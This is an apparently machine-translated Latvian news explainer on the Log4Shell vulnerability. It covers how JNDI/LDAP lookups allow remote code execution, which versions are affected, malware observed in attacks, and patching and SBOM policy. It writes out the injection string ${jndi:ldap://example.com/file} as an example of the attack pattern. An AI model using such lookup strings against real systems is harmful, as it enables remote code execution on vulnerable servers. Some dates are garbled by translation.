Saturs[Paslēpt][Rādīt]
2021. gada novembra beigās mēs atklājām nopietnus draudus kiberdrošībai. Šī izmantošana varētu ietekmēt miljoniem datorsistēmu visā pasaulē.
Šis ir ceļvedis par Log4j ievainojamību un to, kā nepamanīta dizaina nepilnība atstāja vairāk nekā 90% pasaules datorpakalpojumu atvērtus uzbrukumiem.
Apache Log4j ir atvērtā koda Java reģistrēšanas utilīta, ko izstrādājis Apache Software Foundation. Sākotnēji to rakstīja Ceki Gülcü 2001. gadā, bet tagad tas ir daļa no Apache Logging Services, kas ir Apache Software Foundation projekts.
Uzņēmumi visā pasaulē izmanto Log4j bibliotēku, lai iespējotu pieteikšanos savās lietojumprogrammās. Faktiski Java bibliotēka ir tik visuresoša, ka varat to atrast Amazon, Microsoft, Google un citu lietojumprogrammās.
Bibliotēkas izcilība nozīmē, ka jebkura iespējamā koda nepilnība var atstāt miljoniem datoru atvērtus uzlaušanai. 24. gada 2021. novembrī, a mākoņu drošība pētnieks, kas strādā Alibaba, atklāja briesmīgu trūkumu.
Log4j ievainojamība, kas pazīstama arī kā Log4Shell, nepamanīta pastāvēja kopš 2013. gada. Ievainojamība ļāva ļaunprātīgiem dalībniekiem palaist kodu ietekmētajās sistēmās, kurās darbojas Log4j. Tas tika publiski izpausts 9. gada 2021. decembrī
Nozares eksperti Log4Shell trūkumu sauc par lielākā ievainojamība nesenajā atmiņā.
Nedēļā pēc ievainojamības publicēšanas kiberdrošības komandas atklāja miljoniem uzbrukumu. Daži pētnieki pat novēroja ātrumu, kas pārsniedz simts uzbrukumu minūtē.
Kā tas darbojas?
Lai saprastu, kāpēc Log4Shell ir tik bīstams, mums ir jāsaprot, uz ko tas ir spējīgs.
Log4Shell ievainojamība pieļauj patvaļīgu koda izpildi, kas būtībā nozīmē, ka uzbrucējs mērķa mašīnā var palaist jebkuru komandu vai kodu.
Kā tas to panāk?
Pirmkārt, mums ir jāsaprot, kas ir JNDI.
Java nosaukumu un direktoriju saskarne (JNDI) ir Java pakalpojums, kas ļauj Java programmām atklāt un meklēt datus un resursus, izmantojot nosaukumu. Šie direktoriju pakalpojumi ir svarīgi, jo tie nodrošina sakārtotu ierakstu kopu, ko izstrādātāji var viegli izmantot, veidojot lietojumprogrammas.
JNDI var izmantot dažādus protokolus, lai piekļūtu noteiktam direktorijam. Viens no šiem protokoliem ir Lightweight Directory Access Protocol jeb LDAP.
Reģistrējot virkni, log4j veic virkņu aizstāšanu, kad sastopas ar formas izteiksmēm ${prefix:name}
.
Piemēram, Text: ${java:version}
var tikt reģistrēts kā Teksts: Java versija 1.8.0_65. Šāda veida aizstāšana ir ierasta lieta.
Mums var būt arī tādi izteicieni kā Text: ${jndi:ldap://example.com/file}
kas izmanto JNDI sistēmu, lai ielādētu Java objektu no URL, izmantojot LDAP protokolu.
Tas iekārtā efektīvi ielādē datus, kas nāk no šī URL. Jebkurš potenciālais hakeris var mitināt ļaunprātīgu kodu publiskā URL un gaidīt, kamēr mašīnas, kas izmanto Log4j, to reģistrēs.
Tā kā žurnāla ziņojumu saturs satur lietotāja kontrolētus datus, hakeri var ievietot savas JNDI atsauces, kas norāda uz viņu kontrolētajiem LDAP serveriem. Šie LDAP serveri var būt pilni ar ļaunprātīgiem Java objektiem, kurus JNDI var izpildīt, izmantojot ievainojamību.
Sliktāku situāciju padara tas, ka nav nozīmes tam, vai lietojumprogramma ir servera vai klienta puses lietojumprogramma.
Kamēr reģistrētājs var nolasīt uzbrucēja ļaunprātīgo kodu, lietojumprogramma joprojām ir atvērta izmantošanai.
Kas tiek ietekmēts?
Ievainojamība ietekmē visas sistēmas un pakalpojumus, kas izmanto APache Log4j ar versiju 2.0 līdz 2.14.1 ieskaitot.
Vairāki drošības eksperti norāda, ka ievainojamība var ietekmēt vairākas lietojumprogrammas, kas izmanto Java.
Trūkums pirmo reizi tika atklāts Microsoft piederošajā Minecraft videospēlē. Microsoft ir mudinājusi savus lietotājus atjaunināt Java izdevuma Minecraft programmatūru, lai novērstu jebkādu risku.
Džena Īsterija, Kiberdrošības un infrastruktūras drošības aģentūras (CISA) direktore, saka, ka pārdevējiem ir galvenā atbildība lai neļautu lietotājiem ļaunprātīgiem dalībniekiem izmantot šo ievainojamību.
"Pārdevējiem ir arī jāsazinās ar saviem klientiem, lai nodrošinātu, ka galalietotāji zina, ka viņu izstrādājumā ir šī ievainojamība, un viņiem būtu jāpiešķir prioritāte programmatūras atjauninājumiem."
Tiek ziņots, ka uzbrukumi jau sākušies. Uzņēmums Symantec, kas nodrošina kiberdrošības programmatūru, ir novērojis dažādu uzbrukumu pieprasījumu skaitu.
Šeit ir daži pētnieku atklāto uzbrukumu veidu piemēri:
- robottīklu
Bottīkli ir datoru tīkls, ko kontrolē viena uzbrucēja puse. Tie palīdz veikt DDoS uzbrukumus, nozagt datus un citas krāpniecības. Pētnieki novēroja Muhstik robottīklu čaulas skriptos, kas lejupielādēti no Log4j izmantošanas.
- XMRig Miner Trojas zirgs
XMRig ir atvērtā koda kriptovalūtas ieguvējs, kas Monero marķiera ieguvei izmanto centrālos procesorus. Kibernoziedznieki var instalēt XMRig cilvēku ierīcēs, lai viņi varētu izmantot savu apstrādes jaudu bez viņu ziņas.
- Khonsari Ransomware
Ransomware attiecas uz ļaunprātīgas programmatūras veidu, kas paredzēts šifrēt failus datorā. Pēc tam uzbrucēji var pieprasīt samaksu apmaiņā pret piekļuves atdošanu šifrētajiem failiem. Pētnieki atklāja Khonsari izpirkuma programmatūru Log4Shell uzbrukumos. Tie ir vērsti uz Windows serveriem un izmanto .NET ietvaru.
Kas notiek tālāk?
Eksperti prognozē, ka var paiet mēneši vai pat gadi, lai pilnībā novērstu Log4J ievainojamības radīto haosu.
Šis process ietver katras ietekmētās sistēmas atjaunināšanu ar ielāpu versiju. Pat ja visas šīs sistēmas ir izlabotas, joprojām pastāv iespējamu aizmugures durvju draudi, ko hakeri, iespējams, jau ir pievienojuši logam, ka serveri bija atvērti uzbrukumiem.
Daudz risinājumi un mazināšanas pasākumi pastāv, lai novērstu lietojumprogrammu izmantošanu šīs kļūdas dēļ. Jaunā Log4j versija 2.15.0-rc1 mainīja dažādus iestatījumus, lai mazinātu šo ievainojamību.
Visas funkcijas, kas izmanto JNDI, pēc noklusējuma tiks atspējotas, un ir ierobežota arī attālā meklēšana. Uzmeklēšanas funkcijas atspējošana Log4j iestatījumos palīdzēs samazināt iespējamo ekspluatāciju risku.
Ārpus Log4j joprojām ir nepieciešams plašāks plāns, lai novērstu atvērtā pirmkoda izmantošanu.
Maija sākumā Baltais nams izlaida an izpildinstitūcijas rīkojums kuras mērķis bija uzlabot valsts kiberdrošību. Tajā bija iekļauts noteikums programmatūras materiālu sarakstam (SBOM), kas būtībā bija formāls dokuments, kurā bija saraksts ar katru lietojumprogrammas izveidei nepieciešamo vienumu.
Tas ietver tādas daļas kā atvērtā koda izstrādei izmantotās pakotnes, atkarības un API. Lai gan ideja par SBOM ir noderīga pārredzamībai, vai tā patiešām palīdzēs patērētājam?
Atkarību jaunināšana var būt pārāk sarežģīta. Uzņēmumi var vienkārši izvēlēties maksāt jebkādas soda naudas, nevis riskēt tērēt papildu laiku, meklējot alternatīvas paketes. Varbūt šie SBOM būs noderīgi tikai tad, ja tie joma ir ierobežots tālāk.
Secinājumi
Log4j problēma ir vairāk nekā tikai tehniska problēma organizācijām.
Uzņēmumu vadītājiem ir jāapzinās iespējamie riski, kas var rasties, ja viņu serveri, produkti vai pakalpojumi paļaujas uz kodu, kuru viņi paši neuztur.
Paļaušanās uz atvērtā pirmkoda un trešo pušu lietojumprogrammām vienmēr ir saistīta ar zināmu risku. Uzņēmumiem jāapsver iespēja izstrādāt riska mazināšanas stratēģijas, pirms parādās jauni draudi.
Liela daļa tīmekļa ir balstīta uz atvērtā pirmkoda programmatūru, ko uztur tūkstošiem brīvprātīgo visā pasaulē.
Ja vēlamies, lai tīmeklis būtu drošs, valdībām un korporācijām būtu jāiegulda finansējumā atvērtā koda centieni un kiberdrošības aģentūras, piemēram, CISA.
Atstāj atbildi